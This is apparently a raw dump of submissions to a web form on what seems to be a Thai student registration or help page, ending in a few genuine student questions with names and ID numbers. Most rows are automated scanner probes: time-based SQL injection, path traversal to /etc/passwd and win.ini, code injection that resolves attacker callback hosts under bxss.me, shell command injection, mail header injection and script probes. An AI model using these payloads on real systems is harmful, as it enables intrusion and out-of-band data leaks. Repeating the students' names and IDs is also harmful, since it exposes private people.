301 1 gOZroFvd ".gethostbyname(lc("hitxn"."cpvzkgba43f15.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(74).chr(111).chr(88)." 1 2023-09-08 19:17:17
302 1 gOZroFvd ../../../../../../../../../../../../../../etc/passwd 1 2023-09-08 19:17:17
303 1 HttP://bxss.me/t/xss.html?%00 gOZroFvd 1 2023-09-08 19:17:17
304 1 gOZroFvd gOZroFvd '.gethostbyname(lc('hithe'.'whpxtpedacfef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(70).chr(107).chr(65).' 2023-09-08 19:17:17
305 1 echo cnlphz$() leuavr z^xyu||a #' &echo cnlphz$() leuavr z^xyu||a #|" &echo cnlphz$() leuavr z^xyu||a # gOZroFvd 1 2023-09-08 19:17:17
306 1 '" gOZroFvd 1 2023-09-08 19:17:17
307 1 gOZroFvd ../../../../../../../../../../../../../../windows/win.ini 1 2023-09-08 19:17:17
308 1 bxss.me/t/xss.html?%00 gOZroFvd 1 2023-09-08 19:17:17
309 1 gOZroFvd gOZroFvd ".gethostbyname(lc("hithp"."lcxxshpb5c19b.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(75).chr(97).chr(85)." 2023-09-08 19:17:17
310 1 ) gOZroFvd 1 2023-09-08 19:17:17
311 1 file:///etc/passwd gOZroFvd 1 2023-09-08 19:17:16
312 1 ".gethostbyname(lc("hitpl"."kfczmfxx56a8c.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(73).chr(97).chr(68)." gOZroFvd 1 2023-09-08 19:17:16
313 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:16
314 1 gOZroFvd '.gethostbyname(lc('hitpc'.'zrwksctq0032e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(68).chr(113).chr(84).' 1 2023-09-08 19:17:16
315 1 ../gOZroFvd gOZroFvd 1 2023-09-08 19:17:16
316 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:15
317 1 ../../../../../../../../../../../../../../etc/passwd gOZroFvd 1 2023-09-08 19:17:15
318 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:15
319 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:15
320 1 ../../../../../../../../../../../../../../windows/win.ini gOZroFvd 1 2023-09-08 19:17:15
321 1 '.gethostbyname(lc('hitgn'.'nishtuhyb2211.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(85).chr(101).chr(78).' gOZroFvd 1 2023-09-08 19:17:15
322 1 gOZroFvd gOZroFvd 1%0abcc:074625.18974-4994.18974.d0884.19608.2@bxss.me 2023-09-08 19:17:14
323 1 gOZroFvd ${10000427+9999877} 1 2023-09-08 19:17:14
324 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:14
325 1 gOZroFvd gOZroFvd 2023-09-08 19:17:14
326 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:14
327 1 gOZroFvd gOZroFvd to@example.com>%0d%0abcc:074625.18974-4995.18974.d0884.19608.2@bxss.me 2023-09-08 19:17:14
328 1 gOZroFvd gOZroFvd ${10000198+10000081} 2023-09-08 19:17:14
329 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:14
330 1 gOZroFvd gOZroFvd 12345'"'");|]*%00{%0d%0a%bf%27' 2023-09-08 19:17:14
331 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:14
332 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:14
333 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
334 1 12345'"'");|]*%00{%0d%0a%bf%27' gOZroFvd 1 2023-09-08 19:17:13
335 1 gOZroFvd gOZroFvd%0abcc:074625.18974-4992.18974.d0884.19608.2@bxss.me 1 2023-09-08 19:17:13
336 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
337 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
338 1 gOZroFvd 1 2023-09-08 19:17:13
339 1 gOZroFvd to@example.com>%0d%0abcc:074625.18974-4993.18974.d0884.19608.2@bxss.me 1 2023-09-08 19:17:13
340 1 ${9999735+9999728} gOZroFvd 1 2023-09-08 19:17:13
341 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
342 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
343 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:13
344 1 gOZroFvd 12345'"'");|]*%00{%0d%0a%bf%27' 1 2023-09-08 19:17:13
345 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:12
346 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:12
347 1 gOZroFvd gOZroFvd '+response.write(9965917*9458651)+' 2023-09-08 19:17:12
348 1 gOZroFvd%0abcc:074625.18974-4990.18974.d0884.19608.2@bxss.me gOZroFvd 1 2023-09-08 19:17:12
349 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:12
350 1 gOZroFvd gOZroFvd "+response.write(9965917*9458651)+" 2023-09-08 19:17:12
351 1 gOZroFvd 1 2023-09-08 19:17:12
352 1 to@example.com>%0d%0abcc:074625.18974-4991.18974.d0884.19608.2@bxss.me gOZroFvd 1 2023-09-08 19:17:12
353 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:12
354 1 gOZroFvd '+response.write(9038974*9582258)+' 1 2023-09-08 19:17:11
355 1 gOZroFvd gOZroFvd "+"A".concat(70-3).concat(22*4).concat(110).concat(89).concat(116).concat(88)+(require"socket" Socket.gethostbyname("hitdc"+"mnnqtfek52708.bxss.me.")[3].to_s)+" 2023-09-08 19:17:11
356 1 gOZroFvd D8jNq5B6 1 2023-09-08 19:17:11
357 1 gOZroFvd "+response.write(9038974*9582258)+" 1 2023-09-08 19:17:11
358 1 gOZroFvd gOZroFvd '+'A'.concat(70-3).concat(22*4).concat(115).concat(67).concat(117).concat(74)+(require'socket' Socket.gethostbyname('hitrd'+'npjsertub3fa5.bxss.me.')[3].to_s)+' 2023-09-08 19:17:11
359 1 gOZroFvd gOZroFvd BaKdldye 2023-09-08 19:17:11
360 1 gOZroFvd gOZroFvd response.write(9965917*9458651) 2023-09-08 19:17:11
361 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:11
362 1 "+response.write(9007390*9076846)+" gOZroFvd 1 2023-09-08 19:17:10
363 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:10
364 1 gOZroFvd "+"A".concat(70-3).concat(22*4).concat(121).concat(81).concat(114).concat(86)+(require"socket" Socket.gethostbyname("hituh"+"sztznnvj9239c.bxss.me.")[3].to_s)+" 1 2023-09-08 19:17:10
365 1 gOZroFvd response.write(9038974*9582258) 1 2023-09-08 19:17:10
366 1 gOZroFvd '+'A'.concat(70-3).concat(22*4).concat(108).concat(78).concat(121).concat(81)+(require'socket' Socket.gethostbyname('hitsp'+'hjjbauci8e24b.bxss.me.')[3].to_s)+' 1 2023-09-08 19:17:10
367 1 K6eBmEh2 gOZroFvd 1 2023-09-08 19:17:10
368 1 /../../../../../../../../../../windows/system32/BITSADMIN.exe gOZroFvd 1 2023-09-08 19:17:09
369 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:09
370 1 response.write(9007390*9076846) gOZroFvd 1 2023-09-08 19:17:09
371 1 gOZroFvd /../../../../../../../../../../windows/system32/BITSADMIN.exe 1 2023-09-08 19:17:09
372 1 "+"A".concat(70-3).concat(22*4).concat(122).concat(74).concat(106).concat(77)+(require"socket" Socket.gethostbyname("hitrt"+"lyzpxvqbbff23.bxss.me.")[3].to_s)+" gOZroFvd 1 2023-09-08 19:17:09
373 1 '+response.write(9007390*9076846)+' gOZroFvd 1 2023-09-08 19:17:09
374 1 gOZroFvd gOZroFvd /../../../../../../../../../../windows/system32/BITSADMIN.exe 2023-09-08 19:17:09
375 1 '+'A'.concat(70-3).concat(22*4).concat(119).concat(76).concat(120).concat(90)+(require'socket' Socket.gethostbyname('hitpr'+'ssrwnpff1dcfc.bxss.me.')[3].to_s)+' gOZroFvd 1 2023-09-08 19:17:09
376 1 gOZroFvd xfs.bxss.me 1 2023-09-08 19:17:08
377 1 gOZroFvd gOZroFvd xfs.bxss.me 2023-09-08 19:17:08
378 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:08
379 1 gOZroFvd gOZroFvd ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 2023-09-08 19:17:07
380 1 xfs.bxss.me gOZroFvd 1 2023-09-08 19:17:07
381 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:07
382 1 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) gOZroFvd 1 2023-09-08 19:17:06
383 1 gOZroFvd ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 2023-09-08 19:17:06
384 19586553 2023-09-08 19:17:04
385 65012465046 TriDuc On I can't enter the information. and I can't find my name, what should I do? 2023-09-04 19:53:09
386 1 TzwSVsOw TzwSVsOw 1 2023-08-11 13:06:47
387 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:41
388 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:41
389 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:40
390 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:39
391 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:24
392 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:41:11
393 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:40:59
394 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:40:45
395 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:40:27
396 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:40:15
397 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:40:01
398 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:39:44
399 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:39:30
400 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:39:17
401 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:39:04
402 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:50
403 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:50
404 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:49
405 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:49
406 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:48
407 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:47
408 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:33
409 1 TzwSVsOw TzwSVsOw @@hgw3V 2023-08-11 12:38:17
410 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:38:16
411 1 TzwSVsOw TzwSVsOw 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 2023-08-11 12:38:15
412 1 TzwSVsOw TzwSVsOw 1'" 2023-08-11 12:38:15
413 1 TzwSVsOw TzwSVsOw 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 2023-08-11 12:37:59
414 1 TzwSVsOw TzwSVsOw vURmB8l8')) OR 201=(SELECT 201 FROM PG_SLEEP(15))-- 2023-08-11 12:37:47
415 1 TzwSVsOw TzwSVsOw 5ifl3Clt') OR 693=(SELECT 693 FROM PG_SLEEP(15))-- 2023-08-11 12:37:38
416 1 TzwSVsOw TzwSVsOw -1)) OR 26=(SELECT 26 FROM PG_SLEEP(15))-- 2023-08-11 12:37:21
417 1 TzwSVsOw TzwSVsOw -5) OR 301=(SELECT 301 FROM PG_SLEEP(15))-- 2023-08-11 12:37:06
418 1 TzwSVsOw TzwSVsOw -5 OR 825=(SELECT 825 FROM PG_SLEEP(15))-- 2023-08-11 12:36:52
419 1 TzwSVsOw TzwSVsOw guF7P4pj')); waitfor delay '0:0:15' -- 2023-08-11 12:36:39
420 1 TzwSVsOw TzwSVsOw uGBrgNA0'); waitfor delay '0:0:15' -- 2023-08-11 12:36:25
421 1 TzwSVsOw TzwSVsOw Wtn8pU93'; waitfor delay '0:0:15' -- 2023-08-11 12:36:11
422 1 TzwSVsOw TzwSVsOw 1 waitfor delay '0:0:15' -- 2023-08-11 12:35:57
423 1 TzwSVsOw TzwSVsOw -1)); waitfor delay '0:0:15' -- 2023-08-11 12:35:44
424 1 TzwSVsOw TzwSVsOw -1); waitfor delay '0:0:15' -- 2023-08-11 12:35:33
425 1 TzwSVsOw TzwSVsOw -1; waitfor delay '0:0:15' -- 2023-08-11 12:35:22
426 1 TzwSVsOw TzwSVsOw (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 2023-08-11 12:35:10
427 1 TzwSVsOw TzwSVsOw 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 2023-08-11 12:34:57
428 1 TzwSVsOw TzwSVsOw 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 2023-08-11 12:34:45
429 1 TzwSVsOw TzwSVsOw if(now()=sysdate(),sleep(15),0) 2023-08-11 12:34:28
430 1 TzwSVsOw TzwSVsOw -1' OR 2+567-567-1=0+0+0+1 or 'kealnYBs'=' 2023-08-11 12:34:10
431 1 TzwSVsOw TzwSVsOw -1" OR 2+697-697-1=0+0+0+1 -- 2023-08-11 12:34:10
432 1 TzwSVsOw TzwSVsOw -1 OR 2+251-251-1=0+0+0+1 2023-08-11 12:34:09
433 1 TzwSVsOw TzwSVsOw -1' OR 2+473-473-1=0+0+0+1 -- 2023-08-11 12:34:09
434 1 TzwSVsOw TzwSVsOw -1 OR 2+548-548-1=0+0+0+1 -- 2023-08-11 12:34:08
435 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:34:07
436 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:33:56
437 1 TzwSVsOw @@03aHt 1 2023-08-11 12:33:42
438 1 TzwSVsOw 1 1 2023-08-11 12:33:41
439 1 TzwSVsOw TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 1 2023-08-11 12:33:40
440 1 TzwSVsOw 1'" 1 2023-08-11 12:33:40
441 1 TzwSVsOw 9EYoDvec') OR 710=(SELECT 710 FROM PG_SLEEP(15))-- 1 2023-08-11 12:33:15
442 1 TzwSVsOw QkCw7EHF' OR 247=(SELECT 247 FROM PG_SLEEP(15))-- 1 2023-08-11 12:33:00
443 1 TzwSVsOw KRmNyTMa')); waitfor delay '0:0:15' -- 1 2023-08-11 12:32:47
444 1 TzwSVsOw QRCYYDFC'; waitfor delay '0:0:15' -- 1 2023-08-11 12:32:29
445 1 TzwSVsOw 1 waitfor delay '0:0:15' -- 1 2023-08-11 12:32:14
446 1 TzwSVsOw (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1 2023-08-11 12:32:01
447 1 TzwSVsOw 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1 2023-08-11 12:31:48
448 1 TzwSVsOw 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 1 2023-08-11 12:31:40
449 1 TzwSVsOw if(now()=sysdate(),sleep(15),0) 1 2023-08-11 12:31:27
450 1 TzwSVsOw -1" OR 2+865-865-1=0+0+0+1 -- 1 2023-08-11 12:31:11
451 1 TzwSVsOw -1' OR 2+713-713-1=0+0+0+1 -- 1 2023-08-11 12:31:10
452 1 TzwSVsOw -1' OR 2+665-665-1=0+0+0+1 or '0Zrowo7M'=' 1 2023-08-11 12:31:10
453 1 TzwSVsOw -1 OR 2+848-848-1=0+0+0+1 -- 1 2023-08-11 12:31:09
454 1 TzwSVsOw -1 OR 2+990-990-1=0+0+0+1 1 2023-08-11 12:31:09
455 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:31:08
456 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:30:55
457 1 @@sSQUk TzwSVsOw 1 2023-08-11 12:30:42
458 1 1'" TzwSVsOw 1 2023-08-11 12:30:41
459 1 1 TzwSVsOw 1 2023-08-11 12:30:41
460 1 TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' TzwSVsOw 1 2023-08-11 12:30:40
461 1 b0Qp7rRG')) OR 327=(SELECT 327 FROM PG_SLEEP(15))-- TzwSVsOw 1 2023-08-11 12:30:25
462 1 JyUhH7Mv') OR 792=(SELECT 792 FROM PG_SLEEP(15))-- TzwSVsOw 1 2023-08-11 12:30:08
463 1 zqpVRhtZ' OR 169=(SELECT 169 FROM PG_SLEEP(15))-- TzwSVsOw 1 2023-08-11 12:29:54
464 1 GD6PV41W')); waitfor delay '0:0:15' -- TzwSVsOw 1 2023-08-11 12:29:40
465 1 38OYD84i'); waitfor delay '0:0:15' -- TzwSVsOw 1 2023-08-11 12:29:32
466 1 AhEPnTNW'; waitfor delay '0:0:15' -- TzwSVsOw 1 2023-08-11 12:29:26
467 1 1 waitfor delay '0:0:15' -- TzwSVsOw 1 2023-08-11 12:29:13
468 1 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ TzwSVsOw 1 2023-08-11 12:28:57
469 1 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z TzwSVsOw 1 2023-08-11 12:28:43
470 1 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z TzwSVsOw 1 2023-08-11 12:28:29
471 1 if(now()=sysdate(),sleep(15),0) TzwSVsOw 1 2023-08-11 12:28:16
472 1 -1" OR 2+511-511-1=0+0+0+1 -- TzwSVsOw 1 2023-08-11 12:28:04
473 1 -1' OR 2+832-832-1=0+0+0+1 or 'BwHIs4HP'=' TzwSVsOw 1 2023-08-11 12:28:03
474 1 -1 OR 2+369-369-1=0+0+0+1 TzwSVsOw 1 2023-08-11 12:28:02
475 1 -1' OR 2+197-197-1=0+0+0+1 -- TzwSVsOw 1 2023-08-11 12:28:02
476 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:28:01
477 1 -1 OR 2+547-547-1=0+0+0+1 -- TzwSVsOw 1 2023-08-11 12:28:01
478 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:27:50
479 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:23:37
480 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:23:26
481 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:23:02
482 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:22:42
483 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:22:23
484 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:21:50
485 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:15:59
486 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:15:48
487 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:15:41
488 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:15:17
489 0 TzwSVsOw TzwSVsOw 1 2023-08-11 12:14:48
490 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:14:38
491 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:14:38
492 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:14:30
493 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:12:57
494 1 TzwSVsOw TzwSVsOw 1 2023-08-11 12:12:47
495 66010114319 ณวพร เกิดวาระ กรอกเอกสารแล้วค่ะแต่มันขึ้นเหมือนแล้วกรอกใหม่จนถึงวันนี้เข้าอาทิตย์แล้วค่ะยังเป็นเหมือนเดิมอยู่เลยค่ะช่วยตรวจสอบทีได้ไหมคะ 2023-06-13 16:42:27
496 66011112015 พัชริดา สีดำ กรอกรายงานตัววันที่18 ได้ไหมคะพอดีว่าเมื่อวานแนบแค่เอกสาร 2023-02-18 16:44:59
497 66011310066 วรินทร์ลภัส เพ็งวิชัย จ่ายเงินหลังวันที่17ได้ไหมคะ พอดีเงินมาไม่ทันค่ะ 2023-02-17 20:03:29
สำหรับเจ้าหน้าที่